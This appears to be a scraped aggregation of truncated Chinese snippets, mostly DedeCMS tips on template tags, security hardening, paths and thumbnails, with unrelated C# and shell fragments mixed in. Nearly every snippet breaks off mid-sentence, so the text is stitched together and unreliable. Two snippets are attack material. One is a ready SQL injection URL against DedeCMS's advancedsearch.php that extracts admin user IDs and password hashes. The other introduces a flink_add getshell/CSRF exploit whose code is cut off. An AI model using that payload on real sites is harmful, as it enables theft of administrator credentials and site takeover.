{dede:global.cfg_memberurl/} 指的是会员中心 对应/member/目录 {dede:global.cfg_cmsurl/} 对应的是网站根目录/ {dede:global.cfg_dataurl/} data目录对应  /data/ {dede:global.cfg_basehost/} 网站地址 比方:http://www.sina.com {dede:global.cfg_webname/} 网站名称 {dede:global.cfg_soft_lang/} 网页

很多人说dedecms不好,因为用的人多了,找漏洞的人也多了,那么如果我们能修复的话,这些都不是问题. 好,我们来一个一个修复.修复方法都是下载目录下该文件,然后替换或添加部分代码,保存后上传覆盖(记得先备份),这样的好处是防止用懒人包上传之后因为UTF8和GBK不同产生乱码,或者修改过这几个文件,然后直接修改的部分被替换掉,那之前就白改了,找起来也非常的麻烦.如果你搜索不到,看行数,找相近的,然后将我标记红色的部分复制到对应位置.      任意文件上传漏洞修复      一./include

首先需要说明的是,任何程序都是有漏洞的,我们需要做好一些必要的防范,来减少由于程序漏洞造成的损失.织梦的漏洞多,这个是很多人的想法.不过大家如果做好了织梦系统的文件夹权限什么的设置,很多漏洞也是用不上的. 这些安全措施,织梦官方已经给出过很多教程了,如织梦后台中uploads等文件夹执行php文件权限的问题.今天主要说的就是Nginx下取消织梦uploads文件夹权限的问题.如果是在Apache中,可以在.htaccess中通过如下的代码解决: RewriteEngine on  Rewrite

织梦(DedeCMS)模板也是一种财富,不想自己辛辛苦苦做的模板被盗用,在互联网上出现一些和自己一模一样的网站,就需要做好模板防盗.本文是No牛收集整理自网络,不过网上的版本都没有提供 Nginx 301重定向实现dedecms模板防盗的方法和403文件禁止实现织梦模板防盗,自己狗尾续貂,整合到一起了,方便自己以后查询.以下就是织梦模板防盗的四个方法,希望可以帮到大家. 1.系统文件修补法 系统文件修补法这种方法呢,显得比较麻烦一点.也要求对织梦(DedeCMS)系统有一定的熟悉度才建议这样来做

织梦DedeCMS是一款非常流行的CMS,很多刚开始建站人都用的织梦,一方面是织梦比较容易操作;另一方面是织梦的SEO方面做的确实比其他的系统要好一些.这些都导致织梦的用户群是非常庞大的,用的人多了,漏洞自然就多起来,所以织梦的安全性为大家所诟病,很多人在使用中经常会遇到或者担心网站挂马.这里No牛网特意整理一篇关于织梦DedeCMS安全设置的文章,希望对使用织梦的朋友有点帮助. 一般使用织梦建的站只要做到下面一系列针对DEDE网站的安全设置,基本可以避免99% 网站被挂马的情况. 一.精简程序

DedeAMPZ服务器套件 http://dedeampz.dedecms.com/ DedeCMS  PHP开源网站管理系统  CMS系统 http://www.dedecms.com/products/dedecms/downloads/ localhost和 127.0.0.1 http://你的网址/dede/index.php ,开始进行安装 \templets\default   网站页面地址 http://help.dedecms.com/tagdoc/v57/ http://he

DedeCMS flink_add Getshell漏洞 管理员CSRF漏洞 1.漏洞利用 由于tpl.php中的$action,$content,$filename变量没有初始化,从而能操纵这些变量写入任意的代码. 又由于应用没有对管理员的来源页进行任何检查,只是检查了管理员是否登陆,从而造成了CSRF漏洞. 因此可以诱导管理员以管理员的权限写入代码即可. 测试版本:DedeCMS-V5.7-UTF8-SP1-Full 20150618 exp: <?php //print_r($_SERVE

简单用法: {dede:arclist typeid="1" row="} <li class="list[field:global.autoindex/]">[field:title function="cn_substr(@me,63)"/]</li> {/dede:arclist} 输出类似于 <li class="list1">1</li> <li cla

这几天在网站改版,想把网站做大,想做频道页二级域名,于是在做网站的过程中发现一个问题,dedecms开设二级域名后,在二级域名的文章页无法显示图片,查看源代码后发现问题,由于dedecms文章页中的图片默认是相对路径,所以在二级域名中无法调用到了. 使用下面的方法亲测可用: 修改目录include下的文件extend.func.php,在最后面添加一个函数方法function replaceurl($newurl){$newurl=str_replace('src="/uploads/allim

dedecms虽然有诸多漏洞,但不可否认确实是一个很不错的内容管理系统(cms),其他也不乏很多功能实用性的函数,以下就部分列举,持续更新,不作过多说明.使用时需部分修改,你懂的 1.XSS过滤. function XSSClean($val) { global $cfg_soft_lang; if($cfg_soft_lang=='gb2312') gb2utf8($val); if (is_array($val)) { while (list($key) = each($val)) { if

当程序以Windows Services形式启动时当前路径不对 @(操作系统)[博客|dotNet] 很多时候我们需要将我们的程序写成利用Windows服务的形式来让它能够自启动.今天遇到一个问题,当一个程序注册成Windows Services的形式启动的话,当前程序的CurrentDirectory会被设置成系统目录C:\WINDOWS\system32.这样子的话如果你原先程序里访问一些相对路径的资源的话就会出错误,所以需要显示的将当前路径设置到运行程序所在的路径. System.IO.D

using System; using System.Collections.Generic; using System.ComponentModel; using System.Data; using System.Diagnostics;//Debug用 using System.Drawing; using System.IO; using System.Linq; using System.Text; using System.Threading.Tasks; using System.

本文实例讲述了Dedecms去掉URL中a目录的方法.分享给大家,供大家参考.具体分析如下: 使用dedecms的朋友可能会发现自己的URL目录生成是会自动带有一个/A/目录了,那么要如何去掉URL中/a/目录呢,下面我来给大家介绍. 那么怎么去掉/a/,缩短URL呢,方法有两个: 方法一,如果你是新站我们可以在创建时文章栏目的时,选择网站根目录或者cms根目录,这样就会去掉a/ 1.首选在系统设置那的系统基本参数那,文档HTML默认保存路径,把a去掉. 2.然后在到栏目管理那修改下,文件保存目

今天遇到文章标题无论怎么修改,超出二十个汉字不能全部保存,系统只截取前二十个汉字的内容进行保存. 在后台查看系统设置: 系统——其它选项——文档标题最大长度,的值是60,对应的数据库表字段char的长度也是60. 一个汉字占2个字节,按说应该能保存30个汉字才对,搜索后发现以下内容 原因分析:因为UTF-8编码1个中文汉字占用的是3个字节,GBK占用的是2个字节. 对应自己的织梦系统编码为UTF-8,那么60对应的就是20个汉字了. 于是将文档标题最大长度进行修改,如100 数据库dede_ar

在网上找过资料,效果不是很满意,第一个是原理说的不对,第二个是后缀写死. 原文大致如下: 当文章缩略图是自动选取文章内第一个图片裁减所得时 他的命名规则是有规律的 比如原文是1.jpg 它对应的缩略图是1******* 后面多了7个随机字符,既然如此,那么删除缩略图字符串最后七位,然后再补上后缀.jpg不就能反向得到文章的一张图片的地址了,于是作如下处理: 修改include/extend.func.php 添加如下代码: //取第一张图地址 function firstimg($str_pic

1. 获取主机 FTP 和 数据库 信息 1.1 FTP 信息 登录主机管理后台,在 站点信息 中获取到 FTP 和 数据库 的账号密码,连接地址. 如下图所示: 如果忘记密码,可以在这里进行 重置密码.1.2 上传网站的主目录Windows 主机,上传到 FTP 登入的首目录.Linux 主机,上传到 htdocs 这个目录下.2. 上传代码通过第三方 FTP 客户端,连接到主机的FTP ,进行上传网站程序,FlashFXP/8UFTP/FileZilla 都是支持.FTP 上传方法介绍 3.

用织梦建站时,网站底部调用的版权信息最后总会多出一个Power by DedeCms链接,此链接是织梦系统中默认的指向织梦官网的外链.本文就介绍两种去除这个外链的方法. 1.为什么要去除Power by DedeCms 在讲解怎样去除Power by DedeCms前,先要明白为什么要去除这外链.新手站长可能觉的无所谓,不就是给织梦官网做了个外链吗,就当做好事了,没必要费劲除掉这个链接吧. 事实上,自己的网站最好还是去除这链接,有两个原因. (1)正规网站底部的版权信息,应该是显示自己的信息,版

https://www.t00ls.net/thread-35569-1-1.html http://localhost/dedecms/plus/advancedsearch.php?mid=1&_SESSION[123]=select concat(0x7c,userid,0x7c,pwd,0x7c) as aid from `%23@__admin` aaa &sqlhash=123 条件利用: 1.漏洞代码在/plus/advancedsearch.php 文件中2.是一个sql注

代码如下:$this->Fields['typename'] = $this->TypeLink->TypeInfos['typename']; SetSysEnv($this->Fields['typeid'],$this->Fields['typename'],$this->Fields['aid'],$this->Fields['title'],'archives'); 在以下添加代码: Copy code//替换图片Alt为文档标题 复制代码 代码如下:$

现在的采集真是无处不在,尤其是对一些原创性站点,真是烦透了这些采集的人们,如何预防和防止采集呢,站长们!今天先说一下dedecms防采集的办法. 1.随机模版 方法:你多复制N多模版,在body标记附近稍微修改一下 只要你的模版够多,人家就失去耐性,放过你了 缺点:就是要复制N多模版,麻烦 2.防采集混淆 方法:在body表示是插入大量混淆字符别人采集也一并把混淆字符采集过去了. 缺点:有可能对SEO造成影响,对于图片站来说,假如别人不在乎你的混淆字符的话,人家照样采集,别人下载你的图片给你带来

1)接收输入 check_status() { echo --Check hi_repo status is ok? y or n read var if [ "$var" != "y" ] then echo --input is not 'y' exit fi } 1.编写函数check_status,调用时直接写check_status,不用括号: 2.输入read var, 使用时用$var 3.if判断,可以用!=,注意if []的空格: 2)删除空行 #